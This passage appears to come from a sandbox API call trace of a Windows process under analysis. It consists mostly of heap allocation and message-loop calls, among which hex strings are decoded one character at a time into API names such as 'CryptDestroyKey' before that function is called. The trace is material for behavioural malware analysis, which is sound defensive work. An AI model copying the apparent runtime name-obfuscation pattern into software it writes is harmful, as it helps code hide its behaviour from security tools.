Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71998 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9898 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71818 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9760 [0086.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717b8 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717b8 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9898 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9760 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71998 | out: hHeap=0x2af0000) returned 1 [0086.337] lstrlenW (lpString="43") returned 2 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717a8 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.338] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.338] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717b8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717b8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9730 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9898 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717a8 | out: hHeap=0x2af0000) returned 1 [0086.338] lstrlenW (lpString="72") returned 2 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9760 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718d8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71998 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718d8 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.338] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.338] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9898 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.339] lstrlenW (lpString="79") returned 2 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717a8 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.339] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.339] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9898 | out: hHeap=0x2af0000) returned 1 [0086.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.340] lstrlenW (lpString="70") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="74") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="44") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="65") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="73") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="74") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="72") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="6F") returned 2 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.340] lstrlenW (lpString="79") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="4B") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="65") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="79") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="68") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="61") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="6E") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="64") returned 2 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.341] lstrlenW (lpString="6C") returned 2 [0086.342] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.342] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.342] lstrlenW (lpString="65") returned 2 [0086.342] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] lstrlenW (lpString="20") returned 2 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] lstrlenW (lpString="30") returned 2 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] lstrlenW (lpString="20") returned 2 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] lstrlenW (lpString="20") returned 2 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.403] lstrlenW (lpString="31") returned 2 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] lstrlenW (lpString="30") returned 2 [0086.404] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] lstrlenW (lpString="30") returned 2 [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.404] lstrlenW (lpString="20") returned 2 [0086.404] lstrlenW (lpString="30") returned 2 [0086.404] lstrlenW (lpString="20") returned 2 [0086.405] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.405] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0086.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0086.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.405] CryptDestroyKey (hKey=0x9a3b40) returned 1 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 